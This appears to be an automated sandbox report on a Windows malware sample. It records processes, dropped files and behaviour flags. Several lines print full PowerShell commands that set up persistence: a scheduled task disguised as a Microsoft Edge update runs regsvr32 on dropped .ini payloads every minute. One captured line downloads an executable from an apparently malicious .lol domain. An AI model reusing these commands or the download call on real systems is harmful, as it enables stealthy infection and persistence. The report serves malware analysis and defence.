Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: utox_x86_x64.exe.1.dr Static PE information: section name: .rodata
Source: utox_x86_x64.exe.1.dr Static PE information: section name: .xdata
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /4
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /19
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /31
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /45
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /57
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /70
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /81
Source: utox_x86_x64.exe.1.dr Static PE information: section name: /92
Source: ajbs50ul.bat.1.dr Static PE information: section name: .xdata
Source: 4smg.ini.3.dr Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAC33D2A5 pushad ; iretd 4_2_00007FFAAC33D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAC457962 push ebx; retf 4_2_00007FFAAC45796A
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F340F7 push eax; ret 7_3_02F340FB
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F362E3 push ebx; ret 7_3_02F362E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F35ED9 push esi; ret 7_3_02F35EDD
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F34EB2 pushad ; retf 7_3_02F34EB3
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F348BE push eax; retf 7_3_02F348BF
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F31865 push cs; ret 7_3_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F35643 push eax; retf 7_3_02F35645
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F34427 pushad ; ret 7_3_02F34428
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F36C12 push edx; retf 7_3_02F36C26
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F3220B push eax; iretd 7_3_02F32224
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F359E3 push esi; retf 7_3_02F359E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F335EC push esi; ret 7_3_02F335ED
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F317D5 push cs; ret 7_3_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F3430B push eax; retf 7_3_02F3430C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F340F7 push eax; ret 7_2_02F340FB
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F362E3 push ebx; ret 7_2_02F362E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F35ED9 push esi; ret 7_2_02F35EDD
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F34EB2 pushad ; retf 7_2_02F34EB3
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F348BE push eax; retf 7_2_02F348BF
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F31865 push cs; ret 7_2_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F35643 push eax; retf 7_2_02F35645
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F34427 pushad ; ret 7_2_02F34428
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F36C12 push edx; retf 7_2_02F36C26
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F3220B push eax; iretd 7_2_02F32224
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F359E3 push esi; retf 7_2_02F359E6
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F335EC push esi; ret 7_2_02F335ED
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F317D5 push cs; ret 7_2_02F318C4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F3430B push eax; retf 7_2_02F3430C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0DA41B pushad ; iretd 7_2_1C0DA536
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\oSyU.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\4smg.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\4smg.ini
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\oSyU.ini

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'utox_x86_x64.exe') -oulv 'htv7i9rockp24tdocs.lol/utox_x86.p24xp24';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
